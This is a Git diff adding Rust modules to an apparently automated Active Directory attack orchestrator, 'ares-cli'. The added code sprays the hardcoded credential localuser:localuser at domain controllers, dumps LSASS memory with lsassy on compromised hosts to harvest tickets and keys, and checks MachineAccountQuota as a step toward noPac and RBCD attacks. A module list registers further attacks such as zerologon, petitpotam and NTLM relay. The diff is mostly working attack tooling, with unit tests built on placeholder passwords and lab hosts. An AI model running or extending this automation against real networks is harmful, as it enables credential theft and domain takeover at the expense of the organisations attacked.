In one domain this user has Domain Admin privileges. This module +//! specifically tests the localuser:localuser credential combo against each +//! discovered DC, which standard password spraying may miss if it doesn't +//! include "localuser" in its wordlist. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect localuser spray work items from current state. +/// +/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_localuser_spray_work(state: &StateInner) -> Vec<LocaluserWork> { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("localuser:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) { + continue; + } + + items.push(LocaluserWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + }); + } + + items +} + +/// Tests localuser:localuser credentials against each domain. +/// Interval: 45s. +pub async fn auto_localuser_spray( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("localuser_spray") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_localuser_spray_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": "localuser", + "password": "localuser", + "domain": item.domain, + }, + }); + + let priority = dispatcher.effective_priority("localuser_spray"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "localuser credential spray dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "localuser spray deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray"); + } + } + } + } +} + +struct LocaluserWork { + dedup_key: String, + domain: String, + dc_ip: String, +} + +#[cfg(test)] +mod tests { + use super::*; + + // --- collect_localuser_spray_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + 
assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_no_credentials_needed() { + // localuser_spray does NOT require existing credentials (it uses hardcoded 
localuser:localuser) + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn dedup_key_format() { + let key = format!("localuser:{}", "contoso.local"); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "localuser", + "password": "localuser", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "smb_login_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["credential"]["username"], "localuser"); + assert_eq!(payload["credential"]["password"], "localuser"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = LocaluserWork { + dedup_key: "localuser:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "localuser:contoso.local"); + } + + #[test] + fn no_credentials_needed_in_work_struct() { + // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser + let work = LocaluserWork { + dedup_key: "localuser:fabrikam.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + }; + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn 
credential_uses_domain_from_target() { + let domain = "contoso.local"; + let payload = json!({ + "credential": { + "username": "localuser", + "password": "localuser", + "domain": domain, + }, + }); + assert_eq!(payload["credential"]["domain"], domain); + } + + #[test] + fn per_domain_dedup() { + let domains = ["contoso.local", "fabrikam.local"]; + let keys: Vec<String> = domains + .iter() + .map(|d| format!("localuser:{}", d.to_lowercase())) + .collect(); + assert_eq!(keys.len(), 2); + assert_ne!(keys[0], keys[1]); + } +} diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs new file mode 100644 index 00000000..b60597d5 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs @@ -0,0 +1,541 @@ +//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy. +//! +//! After secretsdump or other lateral movement marks a host as owned, +//! this automation dispatches lsassy to dump LSASS process memory and +//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.) +//! that secretsdump alone doesn't capture. +//! +//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes, +//! while lsassy gets live session credentials from LSASS memory. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect lsassy dump work items from current state. +/// +/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime.
+fn collect_lsassy_work(state: &StateInner) -> Vec<LsassyWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Only target hosts we've already owned (secretsdump succeeded) + if !host.owned { + continue; + } + + let dedup_key = format!("lsassy:{}", host.ip); + if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Skip when the host's domain is dominated AND every forest is fully + // owned. We still want LSASS dumps from owned hosts in a not-yet-fully- + // dominated lab (session creds may unlock cross-realm pivots), but once + // we have everything there is no point grinding more memory. + if !domain.is_empty() + && state.dominated_domains.contains(&domain) + && state.has_domain_admin + && state.all_forests_dominated() + { + continue; + } + + // Find a credential for this host's domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any admin credential + state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(LsassyWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dumps LSASS credentials from owned hosts. +/// Interval: 45s. +pub async fn auto_lsassy_dump(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("lsassy_dump") { + info!("lsassy_dump technique not allowed — skipping"); + continue; + } + + let work = { + let state = dispatcher.state.read().await; + let owned_count = state.hosts.iter().filter(|h| h.owned).count(); + let cred_count = state.credentials.len(); + if owned_count > 0 || cred_count > 0 { + info!( + owned_hosts = owned_count, + credentials = cred_count, + "lsassy_dump tick: checking for work" + ); + } + collect_lsassy_work(&state) + }; + + if !work.is_empty() { + info!(count = work.len(), "lsassy_dump work items collected"); + } + + for item in work { + let payload = json!({ + "technique": "lsassy_dump", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("lsassy_dump"); + match dispatcher + .force_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "LSASS dump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key) + .await; + } + Ok(None) => { + info!(host = %item.host_ip, "LSASS dump deferred by throttler"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump"); + } + } + } + } +} + +struct LsassyWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn 
make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_owned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: true, + } + } + + fn make_unowned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + // --- collect_lsassy_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_unowned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + 
assert!(work.is_empty()); + } + + #[test] + fn collect_owned_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_admin_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + // Only admin cred from different domain + quarantine the matching one + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + state.credentials.push(make_admin_credential( + "domadmin", + "Admin!1", + "fabrikam.local", + )); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "domadmin"); + assert!(work[0].credential.is_admin); + } + + #[test] + fn collect_bare_hostname_matches_any_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_owned_host("192.168.58.30", "ws01")); + 
state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .hosts + .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_quarantined_credential_skipped_with_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn dedup_key_format() { + let key = format!("lsassy:{}", "192.168.58.22"); + assert_eq!(key, "lsassy:192.168.58.22"); + } + + #[test] + fn 
dedup_set_name() { + assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "lsassy_dump", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "lsassy_dump"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = LsassyWork { + dedup_key: "lsassy:192.168.58.22".into(), + host_ip: 
"192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "lsassy:192.168.58.22"); + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_extraction_from_fabrikam() { + let hostname = "sql01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_with_various_ips() { + let ips = ["192.168.58.10", "192.168.58.240", "192.168.58.1"]; + for ip in &ips { + let key = format!("lsassy:{ip}"); + assert!(key.starts_with("lsassy:")); + assert!(key.ends_with(ip)); + } + } + + #[test] + fn credential_preference_admin_flag() { + let admin_cred = ares_core::models::Credential { + id: "c1".into(), + username: "domainadmin".into(), + password: "AdminPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let regular_cred = ares_core::models::Credential { + id: "c2".into(), + username: "user1".into(), + password: "UserPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [regular_cred, admin_cred]; + // Fallback logic: find admin credential + let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty()); + assert!(admin.is_some()); + assert_eq!(admin.unwrap().username, "domainadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs new file mode 100644 index 00000000..7c4b5a2e --- /dev/null +++ 
b/ares-cli/src/orchestrator/automation/machine_account_quota.rs @@ -0,0 +1,342 @@ +//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain. +//! +//! The default MAQ of 10 allows any authenticated user to create computer +//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD +//! attacks. If MAQ > 0, downstream modules can proceed with machine account +//! creation-based attacks. +//! +//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota +//! attribute from the domain root. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect MAQ work items from state (pure logic, no async). +fn collect_maq_work(state: &StateInner) -> Vec<MaqWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("maq:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(MaqWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks MAQ setting per domain via LDAP query. +/// Interval: 45s. +pub async fn auto_machine_account_quota( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("machine_account_quota") { + continue; + } + + let work: Vec<MaqWork> = { + let state = dispatcher.state.read().await; + collect_maq_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("machine_account_quota"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "MachineAccountQuota check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup( + &dispatcher.queue, + DEDUP_MACHINE_ACCOUNT_QUOTA, + &item.dedup_key, + ) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "MAQ check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check"); + } + } + } + } +} + +struct MaqWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("maq:{}", "contoso.local"); + assert_eq!(key, "maq:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source:
"test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "machine_account_quota_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MaqWork { + dedup_key: "maq:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "maq:contoso.local"); + } + + // --- collect_maq_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn 
collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back to first + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + 
state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("maq:{}", "contoso.local"); + let key2 = format!("maq:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs index bb8cfd3a..5141a35d 100644 --- a/ares-cli/src/orchestrator/automation/mod.rs +++ b/ares-cli/src/orchestrator/automation/mod.rs @@ -13,59 +13,130 @@ //! all threading hacks since tokio tasks are truly concurrent. 
mod acl; +mod acl_discovery; mod adcs; mod adcs_exploitation; mod bloodhound; +mod certifried; +mod certipy_auth; mod coercion; mod crack; mod credential_access; mod credential_expansion; mod credential_reuse; +mod cross_forest_enum; +mod dacl_abuse; mod delegation; +mod dfs_coercion; +mod dns_enum; +mod domain_user_enum; +mod foreign_group_enum; mod gmsa; +mod golden_cert; mod golden_ticket; mod gpo; +mod gpp_sysvol; +mod group_enumeration; +mod krbrelayup; mod laps; +mod ldap_signing; +mod localuser_spray; +mod lsassy_dump; +mod machine_account_quota; mod mssql; +mod mssql_coercion; mod mssql_exploitation; +mod nopac; +mod ntlm_relay; +mod ntlmv1_downgrade; +mod password_policy; +mod petitpotam_unauth; +mod print_nightmare; +mod pth_spray; mod rbcd; +mod rdp_lateral; mod refresh; mod s4u; +mod searchconnector_coercion; mod secretsdump; mod shadow_credentials; +mod share_coercion; mod share_enum; mod shares; +mod sid_enumeration; +mod smb_signing; +mod smbclient_enum; +mod spooler_check; mod stall_detection; mod trust; mod unconstrained; +mod webdav_detection; +mod winrm_lateral; +mod zerologon; // Re-export all public task functions at the same paths they had before the split. 
